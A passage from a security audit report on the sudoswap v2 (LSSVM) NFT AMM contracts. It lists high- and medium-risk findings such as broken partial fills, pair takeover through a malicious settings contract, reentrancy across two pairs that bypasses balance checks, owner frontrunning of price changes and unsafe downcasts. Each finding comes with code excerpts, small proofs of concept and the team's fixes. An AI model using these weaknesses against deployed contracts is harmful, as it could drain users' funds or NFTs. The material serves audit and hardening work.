Description: Partial fills are currently supported for buy orders in VeryFastRouter.swap(). When _findMaxFillableAmtForBuy() determines numItemsToFill, it is not guaranteed that the underlying pair has that many items left to fill. While the ERC721 swap handles the scenario where the pair balance is less than numItemsToFill in the logic of _findAvailableIds() (maxIdsNeeded vs numIdsFound), the ERC1155 swap is missing a similar check and reduction of item numbers when required. Partial fills for buy orders in ERC1155 swaps will fail when the pair has a balance less than numItemsToFill as determined by _findMaxFillableAmtForBuy(). Partial filling, a key feature of VeryFastRouter, will then not work as expected and would lead to an early revert, which defeats the purpose of swap().

Recommendation: Check numItemsToFill against the pair balance and use the smaller of the two for partial filling, i.e. calculate min(numItemsToFill, erc1155.balanceOf(pair)) as the amount of NFTs to transfer.
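For illustration, a minimal sketch of the recommended clamp (variable names are illustrative, and note that ERC1155's balanceOf also takes the token id):

    uint256 pairBalance = erc1155.balanceOf(address(pair), nftId);
    if (numItemsToFill > pairBalance) {
        numItemsToFill = pairBalance; // fill only what the pair can provide
    }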
+5.1.2 Function token() of cloneERC1155ERC20Pair() reads from wrong location Severity: High Risk Context: LSSVMPairERC20.sol#L26-L31, LSSVMPairCloner.sol#L359-L436 Description: The function token() loads the token data from position 81. However, on ERC1155 pairs it should load it from position 93. Currently it doesn't retrieve the right values and the code won't function correctly. LSSVMPair.sol: _factory := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) LSSVMPair.sol: _bondingCurve := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 20))) LSSVMPair.sol: _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 40))) LSSVMPair.sol: _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), 60))) LSSVMPairERC1155.sol: id := calldataload(add(sub(calldatasize(), paramsLength), 61)) LSSVMPairERC721.sol: _propertyChecker := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 61))) LSSVMPairERC20.sol: _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 81))) function cloneERC1155ERC20Pair(...) ... { assembly { ... mstore(add(ptr, 0x3e), shl(0x60, factory)) // position 0 - 20 bytes mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) // position 20 - 20 bytes mstore(add(ptr, 0x66), shl(0x60, nft)) // position 40 - 20 bytes mstore8(add(ptr, 0x7a), poolType) // position 60 - 1 byte mstore(add(ptr, 0x7b), nftId) // position 61 - 32 bytes mstore(add(ptr, 0x9b), shl(0x60, token)) // position 93 - 20 bytes ... } } Recommendation: After the review started, the function token() has been updated to read the last 20 bytes. See PR#21. Sudorandom Labs: Solved in PR#21. Spearbit: Verified that this is fixed by PR#21.
+5.1.3 Switched order of update leads to incorrect partial fill calculations Severity: High Risk Context: VeryFastRouter.sol#L260-L264 Description: In the binary search, the order of the updates of start and numItemsToFill is switched, with start being updated before numItemsToFill, which itself uses the value of start: start = (start + end)/2 + 1; numItemsToFill = (start + end)/2; This leads to incorrect partial fill calculations when the binary search recurses on the right half. Recommendation: This was found by the project team after the start of the review and fixed (by switching the order of the updates) in PR#27. Sudorandom Labs: Solved in PR#27. Spearbit: Verified that this is fixed by PR#27.
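A minimal sketch of the corrected ordering (the actual change is in PR#27): compute the midpoint once, record it as the candidate fill, and only then advance start:

uint256 mid = (start + end) / 2;
numItemsToFill = mid; // record the candidate fill before moving the window
start = mid + 1;      // then recurse on the right half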
+5.1.4 Swap functions with sell orders in LSSVMRouter will fail for property-check enforced pairs Severity: High Risk Context: LSSVMRouter.sol, VeryFastRouter.sol#L36-L37, VeryFastRouter.sol#L118-L140 Description: Swap functions with sell orders in LSSVMRouter will revert for property-check enforced pairs. While the VeryFastRouter swap function supports sell orders that specify property check parameters for pairs enforcing them, none of the swap functions in LSSVMRouter support the same. Recommendation: Deprecate LSSVMRouter or add support to it for feature-parity with VeryFastRouter. Sudorandom Labs: The VeryFastRouter is intended to be a router rewrite that addresses many of the concerns with the LSSVMRouter. The LSSVMRouter has been modified very little from the audit in v1, with most of the new features (e.g. property check support, multiple token output support, buying with ETH and ERC20, and partial fill) being all moved to the new router. Acknowledged, as mentioned above, property checking is supported in the new VeryFastRouter. LSSVMRouter will be deprecated once full test coverage for VeryFastRouter is achieved. Spearbit: Acknowledged.
+5.1.5 pairTransferERC20From() only supports ERC721 NFTs Severity: High Risk Context: LSSVMRouter.sol#L491-L543, VeryFastRouter.sol#L344-L407 Description: Function pairTransferERC20From(), which is present in both LSSVMRouter and VeryFastRouter, only checks for ERC721_ERC20. This means ERC1155 NFTs are not supported by the routers. The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, "Not ERC20 pair"); ... } Recommendation: After the start of this review, the function pairTransferERC20From() has already been updated in PR#21. Also see issue: "Use of isPair() is not intuitive". Sudorandom Labs: Solved in PR#21 and PR#30. Spearbit: Verified that this is fixed by PR#21 and PR#30.
+5.1.6 Insufficient application of trading fee leads to 50% loss for LPs in swapTokenForAnyNFTs() Severity: High Risk Context: LSSVMPairERC1155.sol#L114, LSSVMPairERC1155.sol#L61-L63, LSSVMPairERC721.sol#L51-L59 Description: The protocol applies a trading fee of 2*tradeFee on NFT buys from pairs (to compensate for 0 fees on NFT sells, as noted in the comment: "// We pull twice the trade fee on buys but don't take trade fee on sells if assetRecipient is set"). While this is enforced in LSSVMPairERC721.swapTokenForSpecificNFTs() and LSSVMPairERC1155.swapTokenForSpecificNFTs(), LSSVMPairERC1155.swapTokenForAnyNFTs() enforces a trading fee of only tradeFee (instead of 2*tradeFee). Affected LPs of pairs targeted by LSSVMPairERC1155.swapTokenForAnyNFTs() will unexpectedly lose 50% of the trade fees. Recommendation: The entire function LSSVMPairERC1155.swapTokenForAnyNFTs() has been removed in a recent PR#22 (after the start of this review). So there is nothing to fix related to this issue. Sudorandom Labs: Acknowledged, as the function has been removed, this should no longer be a concern. Spearbit: Verified that this is fixed by PR#22.
+5.1.7 Royalty not always being taken into account leads to incorrect protocol accounting Severity: High Risk Context: LSSVMPair.sol#L225-L474, LSSVMRouter.sol#L281-L315, LSSVMPairERC1155.sol#L136-L184, StandardSettings.sol#L227-L294, VeryFastRouter.sol#L78-L95 Description: The function getSellNFTQuoteWithRoyalties() is similar to getSellNFTQuote(), except that it also takes the royalties into account. When the function robustSwapNFTsForToken() of the LSSVMRouter is called, it first calls getSellNFTQuote() and checks that a sufficient amount of tokens will be received. Then it calls swapNFTsForToken() with 0 as minExpectedTokenOutput, so it will accept any amount of tokens. swapNFTsForToken() does subtract the royalties, which will result in a lower amount of tokens received and might not be enough to satisfy the requirements of the seller. The same happens in • robustSwapETHForSpecificNFTsAndNFTsToToken and • robustSwapERC20ForSpecificNFTsAndNFTsToToken. Note: Function getSellNFTQuote() of StandardSettings.sol also uses getSellNFTQuote(). However, there it is compared to the results of getBuyInfo(), so this is ok as both don't take the royalties into account. Note: getNFTQuoteForSellOrderWithPartialFill() also has to take royalties into account. function getSellNFTQuote(uint256 numNFTs) ... { (..., outputAmount, ...) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(uint256 assetId, uint256 numNFTs) ... { (..., outputAmount, ...) = bondingCurve().getSellInfo(...); (,, uint256 royaltyTotal) = _calculateRoyaltiesView(assetId, outputAmount); ... outputAmount -= royaltyTotal; } function robustSwapNFTsForToken(...) ... { ... (error,,, pairOutput,) = swapList[i].swapInfo.pair.getSellNFTQuote(swapList[i].swapInfo.nftIds.length); ... if (pairOutput >= swapList[i].minOutput) { ... .swapNFTsForToken(..., 0, ...); } ... } function swapNFTsForToken(...) ... { ...
(protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(numNFTs[0], _bondingCurve, _factory); (... royaltyTotal) = _calculateRoyalties(nftId(), outputAmount); ... outputAmount -= royaltyTotal; ... _sendTokenOutput(tokenRecipient, outputAmount); } Recommendation: Preferably combine the functions getSellNFTQuote() and getSellNFTQuoteWithRoyalties(). Also consider integrating the royalty calculations in _calculateSellInfoAndUpdatePoolParams(). Alternatively, call swapNFTsForToken() with the appropriate minExpectedTokenOutput. Make sure changeSpotPriceAndDelta() keeps functioning with the updates. Double check the comment of LSSVMPair.sol#L62. Update getNFTQuoteForSellOrderWithPartialFill() to take royalties into account. Sudorandom Labs: Solved in PR#29 and PR#27. Spearbit: Verified that this is fixed by PR#29 and PR#27.
+5.1.8 Error return codes of getBuyInfo() and getSellInfo() are sometimes ignored Severity: High Risk Context: ICurve.sol#L38-L87, LSSVMPair.sol#L206-L266 Description: The functions getBuyInfo() and getSellInfo() return an error code when they detect an error. The rest of the returned parameters then have an unusable/invalid value (0). However, some callers of these functions ignore the error code and continue processing with the other unusable/invalid values. The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() pass through the error code, so their callers have to check the error codes too. function getBuyInfo(...) ... returns (CurveErrorCodes.Error error, ...) { } function getSellInfo(...) ... returns (CurveErrorCodes.Error error, ...) { } function getBuyNFTQuote(...) ... returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(...) ... returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(...) ... returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } Recommendation: Always check the return code of the functions getBuyInfo(), getSellInfo(), getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties(). Sudorandom Labs: Solved in PR#94. Spearbit: Verified that this is fixed by PR#94.
+5.1.9 changeSpotPriceAndDelta() only uses ERC721 version of balanceOf() Severity: High Risk Context: StandardSettings.sol#L227-L294 Description: The function changeSpotPriceAndDelta() uses balanceOf() with one parameter. This is the ERC721 variant. In order to support ERC1155, a second parameter with the NFT id has to be supplied. function changeSpotPriceAndDelta(address pairAddress, ...) public { ... if ((newPriceToBuyFromPair < priceToBuyFromPair) && pair.nft().balanceOf(pairAddress) >= 1) { ... } } Recommendation: Detect the use of ERC1155 and use the appropriate balanceOf() version. Sudorandom Labs: Solved in PR#30. Spearbit: Verified that this is fixed by PR#30.
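A minimal sketch of the recommended detection, assuming an ERC165 probe (the nftId() accessor and the exact pair interface are assumptions, not the PR#30 code):

// 0xd9b67a26 is the ERC1155 interface id per ERC165
address nft = address(pair.nft());
uint256 pairBalance = IERC165(nft).supportsInterface(0xd9b67a26)
    ? IERC1155(nft).balanceOf(pairAddress, pair.nftId()) // ERC1155: per-id balance
    : IERC721(nft).balanceOf(pairAddress);               // ERC721: total balance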
5.2 Medium Risk
+5.2.1 _pullTokenInputAndPayProtocolFee() doesn't check that tokens are received Severity: Medium Risk Context: LSSVMPairERC20.sol#L34-L115 Description: The function _pullTokenInputAndPayProtocolFee() doesn't verify that it actually received the tokens after doing safeTransferFrom(). This can be an issue with fee-on-transfer tokens. This is also an issue with (accidentally) non-existing tokens, as safeTransferFrom() won't revert on those, see the POC below. Note: also see issue "Malicious router mitigation may break for deflationary tokens". function _pullTokenInputAndPayProtocolFee(...) ... { ... _token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount); ... } Proof of Concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import "hardhat/console.sol"; import {ERC20} from "https://raw.githubusercontent.com/transmissions11/solmate/main/src/tokens/ERC20.sol"; import {SafeTransferLib} from "https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/SafeTransferLib.sol"; contract test { using SafeTransferLib for ERC20; function t() public { ERC20 _token = ERC20(address(1)); _token.safeTransferFrom(msg.sender, address(0), 100); console.log("after safeTransferFrom"); } } Recommendation: Check the balance before and after safeTransferFrom(). Consider checking that the tokens exist in LSSVMPairFactory. Sudorandom Labs: Acknowledged, pair owners should verify the token addresses for tokens they want to list. Separately, fee on transfer tokens are beyond the current scope of the protocol, so undefined behavior is an acceptable risk. Spearbit: Acknowledged.
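A minimal sketch of the recommended check, using the names from the snippet above (this also reverts for non-existing token contracts, since the balanceOf() call itself fails against an address without code):

uint256 balanceBefore = _token.balanceOf(_assetRecipient);
_token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount);
// Require that the recipient actually received the full amount
require(_token.balanceOf(_assetRecipient) - balanceBefore == saleAmount, "Tokens not received");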
+5.2.2 A malicious settings contract can call onOwnershipTransferred() to take over pair Severity: Medium Risk Context: StandardSettings.sol#L118-L158 Description: The function onOwnershipTransferred() can be called from a pair via call(). This can be done either before transferOwnership() or after it. If it is called before, then it updates the AssetRecipient. It can only be called after transferOwnership() when an alternative (malicious) settings contract is used. In that situation pairInfos[] is overwritten and the original owner is lost; so effectively the pair can be taken over. Note: if the settings contract is malicious then there are different ways to take over the pair, but using this approach the vulnerabilities can be hidden. function onOwnershipTransferred(address prevOwner, bytes memory) public payable { ILSSVMPair pair = ILSSVMPair(msg.sender); require(pair.poolType() == ILSSVMPair.PoolType.TRADE, "Only TRADE pairs"); ... } Recommendation: 1. In onOwnershipTransferred() check that address(this) is the owner of the pair. 2. In onOwnershipTransferred() check that pairInfos[] hasn't been used before. 3. As an extra protection, in function call() of LSSVMPair, disallow calling onOwnershipTransferred(). Note: also see related issue "Function call() is risky and can be restricted further". Sudorandom Labs: Solved in PR#34. Spearbit: Verified that PR#34 implements recommendation (3).
+5.2.3 One can attempt to steal a pair's ETH Severity: Medium Risk Context: StandardSettings.sol#L301-L305, Splitter.sol#L26-L29, LSSVMPairETH.sol#L103-L105 Description: Anyone can pass the enrolled pair's address instead of a splitter address in bulkWithdrawFees() to effectively call the pair's withdrawAllETH() instead of a splitter's withdrawAllETH(). Anyone can attempt to steal/drain all the ETH from a pair. However, the pair's withdrawAllETH() sends ETH to the owner, which in this case is the settings contract. The settings contract is unable to receive ETH as currently implemented. So the attempt reverts. Recommendation: This was fixed by the project team, after the review started, by changing the Splitter's function signature from withdrawAllETH() to withdrawAllETHInSplitter() in PR#36. Additionally: 1. Check that none of the addresses in splitterAddresses of bulkWithdrawFees() are pair addresses. 2. Change the access control for bulkWithdrawFees() from permissionless to onlyOwner, which adds an extra layer of defense. 3. Ensure that the settings contract cannot receive ETH, to prevent a malicious setting from draining the pair. 4. Given that PropertyCheckers and Settings are not sufficiently restricted, any arbitrary settings contract may accidentally be allowed, which makes PR#36 ineffective; ensure that a new settings contract is audited to make sure it doesn't call any of the withdraw functions. Sudorandom Labs: Addressed, as the function signature for withdrawAllETH has now been changed. Spearbit: Verified that the Splitter's function signature is changed from withdrawAllETH() to withdrawAllETHInSplitter() in PR#36. StandardSettings having no receive function addresses recommendation (3).
+5.2.4 swap() could mix tokens with ETH Severity: Medium Risk Context: VeryFastRouter.sol#L102-L212 Description: The function swap() adds the output of swapNFTsForToken() to the ethAmount. Although this only happens when order.isETHSell == true, this value could be set to the wrong value accidentally or on purpose. Then the number of received ERC20 tokens could be added to the ethAmount, which is clearly unwanted. The resulting ethAmount is returned to the user. Luckily the router (normally) doesn't have extra ETH, so the impact should be limited. function swap(Order calldata swapOrder) external payable { uint256 ethAmount = msg.value; if (order.isETHSell && swapOrder.recycleETH) { ... outputAmount = pair.swapNFTsForToken(...); ... ethAmount += outputAmount; ... } ... // Send excess ETH back to token recipient if (ethAmount > 0) { payable(swapOrder.tokenRecipient).safeTransferETH(ethAmount); } } Recommendation: Verify the parameters supplied to swap() are compatible with the type of pair. Sudorandom Labs: As the router is not intended to hold ETH, this is an acceptable risk. Spearbit: Acknowledged.
+5.2.5 Using a single tokenRecipient in VeryFastRouter could result in locked NFTs Severity: Medium Risk Context: VeryFastRouter.sol#L45, VeryFastRouter.sol#L134-L139, VeryFastRouter.sol#L158-L210, LSSVMRouter.sol#L42-L43 Description: VeryFastRouter uses a single tokenRecipient address for both ETH/tokens and NFTs, unlike LSSVMRouter which uses a separate tokenRecipient and nftRecipient. It is error-prone to have a single tokenRecipient receive both tokens and NFTs, especially when the other/existing LSSVMRouter has a separate nftRecipient. VeryFastRouter.swap() sends both sell order tokens and buy order NFTs to tokenRecipient. Front-ends integrating with both routers (or migrating to the new one) may surprise users by sending both tokens and NFTs to the same address when interacting with this router. This, coupled with the use of nft.transferFrom(), may result in NFTs being sent to contracts that are not ERC-721 receivers and get them locked forever. Recommendation: Consider a separate nftRecipient in orders similar to LSSVMRouter. Sudorandom Labs: Solved in PR#57. Spearbit: Verified that this is fixed by PR#57.
+5.2.6 Owner can mislead users by abusing changeSpotPrice() and changeDelta() Severity: Medium Risk Context: LSSVMPair.sol#L584-L604 Description: A malicious owner could set up a pair which promises to buy NFTs for high prices. As soon as someone tries to trade, the owner could frontrun the transaction by setting the spot price to 0 and get the NFT for free. Both changeSpotPrice() and changeDelta() can be used to immediately change trade parameters, where the after-effects depend on the curve being used.
Note: The swapNFTsForToken() parameter minExpectedTokenOutput and the swapTokenForSpecificNFTs() parameter maxExpectedTokenInput protect users against sudden price changes, but users might not always set them in an optimal way. A design goal of the project team is that the pool owner can quickly respond to changing market conditions, to prevent unnecessary losses. function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { ... } function changeDelta(uint128 newDelta) external onlyOwner { ... } Recommendation: Consider introducing a small delay of 1 or 2 blocks to prevent frontrunning. It could be done, for example, with 2 functions: announce(newSpotPrice), which registers the timestamp + new price and emits an event (for transparency), followed by the existing changeSpotPrice(), which checks that the current timestamp is more than n blocks after the previously announced timestamp. Sudorandom Labs: Acknowledged, callers should use maxInput and minOutput to protect themselves. Spearbit: Acknowledged.
+5.2.7 Pair may receive less ETH trade fees than expected under certain conditions Severity: Medium Risk Context: LSSVMPairETH.sol#L48-L55 Description: Depending on the values of the protocol fee and royalties, if _feeRecipient == _assetRecipient, the pair will receive less trade fees than expected. Assume a scenario where inputAmount == 100, protocolFee == 30, royaltyTotal == 60 and tradeFeeAmount == 20. This will result in a revert because of underflow in saleAmount -= tradeFeeAmount; when _feeRecipient != _assetRecipient. However, when _feeRecipient == _assetRecipient, the pair will receive trade fees of 100 - 30 - 60 = 10, whereas it normally would have expected 20. Recommendation: One option is to only skip the transfer of trade fees when _feeRecipient == _assetRecipient but allow the subtraction to revert on any underflows. Sudorandom Labs: Solved in PR#59. Spearbit: Verified that this is fixed by PR#59.
+5.2.8 Swapping tokens/ETH for NFTs may exhibit unexpected behavior for certain values of input amount, trade fees and royalties Severity: Medium Risk Context: LSSVMPairERC20.sol#L34-L115, LSSVMPairETH.sol#L22-L73 Description: The _pullTokenInputAndPayProtocolFee() function pulls ERC20/ETH from the caller/router and pays protocol fees, trade fees and royalties proportionately. Trade fees have a threshold of MAX_FEE == 50%, which allows 2*fee to be 100%. Royalty amounts could technically be any percentage as well. This allows edge cases where the protocol fee, trade fee and royalty amounts add up to be > inputAmount. In LSSVMPairERC20, the ordering of subtracting/transferring the protocolFee and royaltyTotal first causes the final attempted transfer of tradeFeeAmount to either revert because of unavailable funds or use any remaining funds from the pair itself. In LSSVMPairETH, the ordering of subtracting/transferring the trade fees and royaltyTotal first causes the final attempted transfer of protocolFee to either revert because of unavailable funds or use any remaining funds from the pair itself. Recommendation: Check that protocolFee + royaltyTotal + tradeFeeAmount < inputAmount. Consider making the order of operations/transfers the same between LSSVMPairERC20 and LSSVMPairETH to make their behavior/failure modes consistent. Sudorandom Labs: Acknowledged, no change beyond PR#59 to address the specific trade fee issue. The cases here deal with situations when the royalty percentage is very high (e.g. 50% or more), which we are fine acknowledging but leaving out of scope. Spearbit: Acknowledged.
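A minimal sketch of the recommended sanity check (the placement at the top of _pullTokenInputAndPayProtocolFee() and the revert message are assumptions):

// Reject edge cases where fees plus royalties would exceed the amount paid in
require(protocolFee + royaltyTotal + tradeFeeAmount < inputAmount, "Fees exceed input");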
+5.2.9 NFTs may be exchanged for 0 tokens when price decreases too much Severity: Medium Risk Context: LinearCurve.sol#L98-L161 Description: The sale of multiple NFTs, in combination with linear curves, results in a price decrease. When the resulting price is below 0, getSellInfo() calculates how many NFTs are required to reach a price of 0. However, the complete number of NFTs is transferred from the originator of the transaction, even though the last few NFTs are worth 0. This might be undesirable for the originator. function getSellInfo(..., uint256 numItems, ...) ... { ... uint256 totalPriceDecrease = delta * numItems; if (spotPrice < totalPriceDecrease) { ... uint256 numItemsTillZeroPrice = spotPrice / delta + 1; numItems = numItemsTillZeroPrice; } } Recommendation: Consider letting function getSellInfo() return the number of NFTs that are rational to sell. Then transfer only that many NFTs from the originator of the transaction. Sudorandom Labs: Acknowledged, users intending to sell should use the minExpectedTokenOutput to lower bound the amount of tokens they receive. The routing / pricing calculation is intended to be done by callers beforehand (either on-chain or through a client). No change to the ICurve interface at this time. Spearbit: Acknowledged.
+5.2.10 balanceOf() can be circumvented via reentrancy and two pairs Severity: Medium Risk Context: LSSVMPairERC1155.sol#L222-L246 Description: A reentrancy issue can occur if two pairs with the same ERC1155 NFT id are deployed. Via a call to swap NFTs, the ERC1155 callback onERC1155BatchReceived() is called. This callback can start a second NFT swap via a second pair. As the second pair has its own reentrancy modifier, this is allowed. This way the balanceOf() check of _takeNFTsFromSender() can be circumvented. If a reentrant call to a second pair supplies a sufficient amount of NFTs, then the balanceOf() check of the original call can be satisfied at the same time. We haven't found a realistic scenario to abuse this with the current routers. Permissionless routers will certainly increase the risk as they can abuse isRouter == true. If the router is malicious then it also has other ways to steal the NFTs; however, with the reentrancy scenario it might be less obvious this is happening. Note: ERC777 tokens also contain such a callback and have the same interface as ERC20, so they could be used in an ERC20 pair. function _takeNFTsFromSender(IERC1155 _nft, uint256 numNFTs, bool isRouter, address routerCaller) ... { ... if (isRouter) { ... uint256 beforeBalance = _nft.balanceOf(_assetRecipient, _nftId); ... router.pairTransferERC1155From(...); // reentrancy with other pair require((_nft.balanceOf(_assetRecipient, _nftId) - beforeBalance) == numNFTs, ...); // circumvented } else { ... } } Recommendation: 1. Thoroughly verify routers before whitelisting them. 2. To protect against reentrancy issues involving multiple pairs, consider putting the reentrancy storage variable in a common location, for example in the LSSVMPairFactory. Sudorandom Labs: Solved in PR#83 and PR#93. Spearbit: Verified that this is fixed by PR#83 and PR#93.
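A minimal sketch of recommendation (2), assuming a hypothetical factory-level lock shared by all pairs (this is not the PR#83/PR#93 implementation; isValidPair() stands in for the factory's existing pair check):

// In LSSVMPairFactory: one lock shared by every pair it deployed
bool internal locked;
function lock() external { require(isValidPair(msg.sender) && !locked, "Reentrancy"); locked = true; }
function unlock() external { require(isValidPair(msg.sender)); locked = false; }

// In LSSVMPair: take the shared lock instead of a per-pair flag
modifier nonReentrant() { factory().lock(); _; factory().unlock(); }

With a shared lock, a reentrant swap through a second pair hits the same guard as the first, closing the two-pair bypass.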
+5.2.11 Function call() is risky and can be restricted further Severity: Medium Risk Context: LSSVMPair.sol#L640-L645 Description: The function call() is powerful and thus risky. To reduce the risk it can be restricted further by disallowing potentially dangerous function selectors. This is also a step closer to introducing permissionless routers. function call(address payable target, bytes calldata data) external onlyOwner { ILSSVMPairFactoryLike _factory = factory(); require(_factory.callAllowed(target), "Target must be whitelisted"); (bool result,) = target.call{value: 0}(data); require(result, "Call failed"); } Recommendation: Filter out unwanted function selectors, for example for the following functions: pairTransferERC20From(), pairTransferNFTFrom(), pairTransferERC1155From(), onOwnershipTransferred(). Sudorandom Labs: Solved in PR#44. Spearbit: Verified that this is fixed by PR#44.
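A minimal sketch of the recommended selector filtering (the interface names are assumptions; the actual fix is in PR#44):

function call(address payable target, bytes calldata data) external onlyOwner {
    ILSSVMPairFactoryLike _factory = factory();
    require(_factory.callAllowed(target), "Target must be whitelisted");
    // Reject calldata whose 4-byte selector matches a known dangerous function
    bytes4 selector = bytes4(data[:4]);
    require(
        selector != ILSSVMRouter.pairTransferERC20From.selector
            && selector != ILSSVMRouter.pairTransferNFTFrom.selector
            && selector != ILSSVMRouter.pairTransferERC1155From.selector
            && selector != IOwnershipTransferReceiver.onOwnershipTransferred.selector,
        "Banned function selector"
    );
    (bool result,) = target.call{value: 0}(data);
    require(result, "Call failed");
}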
+5.2.12 Incorrect newSpotPrice and newDelta may be obtained due to unsafe downcasts Severity: Medium Risk Context: XykCurve.sol#L83 and XykCurve.sol#L130 Description: When calculating newSpotPrice in getBuyInfo(), an unsafe downcast from uint256 into uint128 may occur and silently overflow, leading to a much smaller value for newSpotPrice than expected. function getBuyInfo(uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier) external pure override returns (Error error, uint128 newSpotPrice, uint128 newDelta, uint256 inputValue, uint256 tradeFee, uint256 protocolFee) { ... // get the pair's virtual nft and token reserves uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // calculate the amount to send in uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... // set the new virtual reserves newSpotPrice = uint128(spotPrice + inputValueWithoutFee); // token reserve ... } The same happens when calculating newDelta in getSellInfo(): function getSellInfo(uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier) external pure override returns (Error error, uint128 newSpotPrice, uint128 newDelta, uint256 outputValue, uint256 tradeFee, uint256 protocolFee) { ... // get the pair's virtual nft and eth/erc20 balance uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // set the new virtual reserves newDelta = uint128(nftBalance + numItems); // nft reserve ... } Proof of concept showing how this wouldn't revert but silently overflow: import "hardhat/console.sol"; contract test { constructor() { uint256 a = type(uint128).max; uint256 b = 2; uint128 c = uint128(a + b); console.log(c); // c == 1, no error } } Recommendation: Check if the value would overflow before casting, as is already done in other places. This can also be done with libraries such as OpenZeppelin SafeCast. // set the new virtual reserves + uint256 _newDelta = nftBalance + numItems; + if (_newDelta > type(uint128).max) { + return (Error.SPOT_PRICE_OVERFLOW, 0, 0, 0, 0, 0); + } - newDelta = uint128(nftBalance + numItems); // nft reserve + newDelta = uint128(_newDelta); // nft reserve Sudorandom Labs: Solved in PR#42. Spearbit: Verified that this is fixed by PR#42.
+5.2.13 Fewer checks in pairTransferNFTFrom() and pairTransferERC1155From() than in pairTransferERC20From() Severity: Medium Risk Context: LSSVMRouter.sol#L491-L543, VeryFastRouter.sol#L344-L407 Description: The functions pairTransferNFTFrom() and pairTransferERC1155From() don't verify that the correct type of pair is used, whereas pairTransferERC20From() does. This means actions could be attempted on the wrong type of pair. These could succeed, for example, if an NFT is used that supports both ERC721 and ERC1155. Note: also see issue "pairTransferERC20From only supports ERC721 NFTs". The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, "Not ERC20 pair"); ... } function pairTransferNFTFrom(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... } function pairTransferERC1155From(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... } Recommendation: Add checks comparable to those in pairTransferERC20From() to the functions pairTransferNFTFrom() and pairTransferERC1155From(). Sudorandom Labs: Solved in PR#30. Spearbit: Verified that this is fixed by PR#30.
+5.2.14 A malicious collection admin can reclaim a pair at any time to deny enhanced setting royalties Severity: Medium Risk Context: StandardSettings.sol#L164-L178 Description: A collection admin can forcibly/selectively call reclaimPair() prematurely (before the advertised and agreed upon lockup period) to unilaterally break the settings contract at any time. This will effectively lead to a DoS on the pair owner for the enhanced royalty terms of the setting, despite paying the upfront fee and agreeing to a fee split in return. This is because the unlockTime is enforced only on the previous pair owner and not on collection admins. A malicious collection admin can advertise very attractive setting royalty terms to entice pair owners to pay a high upfront fee to sign up for their settings contract, but then force-end the contract prematurely. This will lead to the pair owner losing the paid upfront fee and the promised attractive royalty terms. A lax pair owner who may not be actively monitoring SettingsRemovedForPair events before the lockup period will be surprised by the prematurely forced settings contract termination by the collection admin, the loss of their earlier paid upfront fee and any payments of default royalty instead of their expected enhanced amounts. Recommendation: Enforce unlockTime on collection admins authorized by authAllowedForToken. Sudorandom Labs: Addressed in PR#85. Spearbit: Verified that this is fixed by PR#85.
+5.2.15 PropertyCheckers and Settings not sufficiently restricted Severity: Medium Risk Context: LSSVMPairFactory.sol#L120-L201, LSSVMPairFactory.sol#L430-L433, LSSVMPairFactory.sol#L485-L492, StandardSettingsFactory.sol, PropertyCheckerFactory.sol Description: The LSSVMPairFactory accepts any address for external contracts which contain critical logic, but there are no sanity checks done on them. These are the _bondingCurve, _propertyChecker and settings contracts. The contracts could perhaps be updated later via a proxy pattern or a create2/selfdestruct pattern, which means that it's difficult to completely rely on them. Both _propertyChecker and settings contracts have a factory associated: PropertyCheckerFactory and StandardSettingsFactory. It is straightforward to enforce that only contracts created by the factory can be used. For the bondingCurves there is a whitelist that limits the risk. function createPairERC721ETH(..., ICurve _bondingCurve, ..., address _propertyChecker, ...) ... { ... // no checks on _bondingCurve and _propertyChecker } function toggleSettingsForCollection(address settings, address collectionAddress, bool enable) public { ...
// no checks on settings } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { bondingCurveAllowed[bondingCurve] = isAllowed; emit BondingCurveStatusUpdate(bondingCurve, isAllowed); } Recommendation: Enforce that only contracts created by the factories PropertyCheckerFactory and StandardSettingsFactory can be used. This can be done by keeping a mapping in these contracts which stores all the generated contracts and can then be queried by the factories to verify their origin. Note: this requires that the LSSVMPairFactory is aware of the address of the factories. Sudorandom Labs: Acknowledged, this is intended behavior. The factories for property checking and settings are intended to be open-ended for e.g. future types of property checkers or settings. The property checker factory and settings factory included in the audit are designed to be the recommended ones at start, but not the only choices available (clients may decide to filter pairs to show only pairs with values created from the factories). Spearbit: Acknowledged.
